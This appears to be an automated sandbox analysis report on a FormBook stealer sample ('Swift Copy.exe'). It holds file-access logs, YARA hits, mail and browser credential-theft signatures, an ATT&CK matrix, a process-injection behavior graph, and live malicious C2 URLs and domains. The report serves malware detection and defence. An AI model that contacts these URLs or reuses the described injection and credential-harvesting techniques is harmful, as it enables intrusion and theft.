          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		1
          Scheduled Task/Job          		712
          Process Injection          		11
          Disable or Modify Tools          		1
          OS Credential Dumping          		1
          System Network Connections Discovery          		Remote Services11
          Archive Collected Data          		Exfiltration Over Other Network Medium3
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Scheduled Task/Job          		Boot or Logon Initialization Scripts1
          Scheduled Task/Job          		11
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          File and Directory Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)3
          Obfuscated Files or Information          		Security Account Manager13
          System Information Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
          Software Packing          		NTDS221
          Security Software Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer114
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Masquerading          		LSA Secrets2
          Process Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common31
          Virtualization/Sandbox Evasion          		Cached Domain Credentials31
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items712
          Process Injection          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          Remote System Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
          System Network Configuration Discovery          		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 682145 Sample: Swift Copy.exe Startdate: 11/08/2022 Architecture: WINDOWS Score: 100 39 www.posinet1.com 2->39 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for URL or domain 2->49 51 Multi AV Scanner detection for dropped file 2->51 53 8 other signatures 2->53 9 Swift Copy.exe 7 2->9         started        signatures3 process4 file5 33 C:\Users\user\AppData\...\ImUIYlbLTIh.exe, PE32 9->33 dropped 35 C:\Users\user\AppData\Local\...\tmpE16E.tmp, XML 9->35 dropped 37 C:\Users\user\AppData\...\Swift Copy.exe.log, ASCII 9->37 dropped 61 Writes to foreign memory regions 9->61 63 Adds a directory exclusion to Windows Defender 9->63 65 Injects a PE file into a foreign processes 9->65 13 RegSvcs.exe 9->13         started        16 powershell.exe 19 9->16         started        18 schtasks.exe 1 9->18         started        signatures6 process7 signatures8 75 Modifies the context of a thread in another process (thread injection) 13->75 77 Maps a DLL or memory area into another process 13->77 79 Sample uses process hollowing technique 13->79 81 Queues an APC in another process (thread injection) 13->81 20 explorer.exe 13->20 injected 24 conhost.exe 16->24         started        26 conhost.exe 18->26         started        process9 dnsIp10 41 mogdento.com 103.92.235.55, 49825, 49828, 80 ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN India 20->41 43 kinemartigues.com 51.159.175.169, 49819, 49821, 80 OnlineSASFR France 20->43 45 7 other IPs or domains 20->45 55 System process connects to network (likely due to code injection or exploit) 20->55 57 Performs DNS queries to domains with low reputation 20->57 59 Uses netstat to query active network connections and open ports 20->59 28 NETSTAT.EXE 13 20->28         started        31 autofmt.exe 20->31         started        signatures11 process12 signatures13 67 Tries to steal Mail credentials (via file / registry access) 28->67 69 Tries to harvest and steal browser information (history, passwords, etc) 28->69 71 Modifies the context of a thread in another process (thread injection) 28->71 73 Maps a DLL or memory area into another process 28->73

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Swift Copy.exe21%VirustotalBrowse
          Swift Copy.exe20%ReversingLabsByteCode-MSIL.Spyware.Noon

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe20%ReversingLabsByteCode-MSIL.Spyware.Noon

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          8.0.RegSvcs.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          kinemartigues.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.epic45.co.uk/bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0100%Avira URL Cloudmalware
          http://philiphanson.org/medius/book/1.00%Avira URL Cloudsafe
          http://www.kinemartigues.com/bwe0/100%Avira URL Cloudmalware
          http://schemas.micr$0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.epic45.co.uk/bwe0/100%Avira URL Cloudmalware
          www.my1245.com/bwe0/100%Avira URL Cloudmalware
          http://www.mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w==100%Avira URL Cloudmalware
          https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&amp;9rV8zl=M79ygOKZB0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9100%Avira URL Cloudmalware
          http://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA==100%Avira URL Cloudmalware
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB0%Avira URL Cloudsafe
          http://www.mogdento.com/bwe0/100%Avira URL Cloudmalware
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
